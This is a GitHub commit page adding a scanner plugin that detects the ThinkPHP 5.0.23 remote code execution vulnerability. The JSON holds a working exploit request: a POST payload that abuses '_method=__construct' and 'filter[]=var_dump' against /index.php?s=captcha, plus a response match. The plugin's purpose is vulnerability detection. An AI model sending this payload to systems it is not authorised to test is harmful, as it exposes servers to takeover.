We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 3029af8 + ad8bbcd commit 2abf542Copy full SHA for 2abf542
plugin/json/thinkphp_5023_rce.json
@@ -0,0 +1,23 @@
1
+{
2
+ "target":"thinkphp",
3
+ "meta":{
4
+ "name": "ThinkPHP5 5.0.23 远程代码执行漏洞",
5
+ "remarks": "其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞,可导致服务器直接被入侵控制。",
6
+ "level": 0,
7
+ "type": "RCE",
8
+ "author": "phith0n",
9
+ "references": {
10
+ "url":"https://github.com/vulhub/vulhub/blob/master/thinkphp/5.0.23-rce/README.zh-cn.md",
11
+ "cve":"",
12
+ "kpid":"KP-0079"
13
+ }
14
+ },
15
+ "request":{
16
+ "path": "/index.php?s=captcha",
17
+ "postData": "_method=__construct&filter[]=var_dump&method=get&server[REQUEST_METHOD]=pGiopzVOki1L"
18
19
+ "verify":{
20
+ "type": "string",
21
+ "match": "string(12) \"pGiopzVOki1L\""
22
23
+}
0 commit comments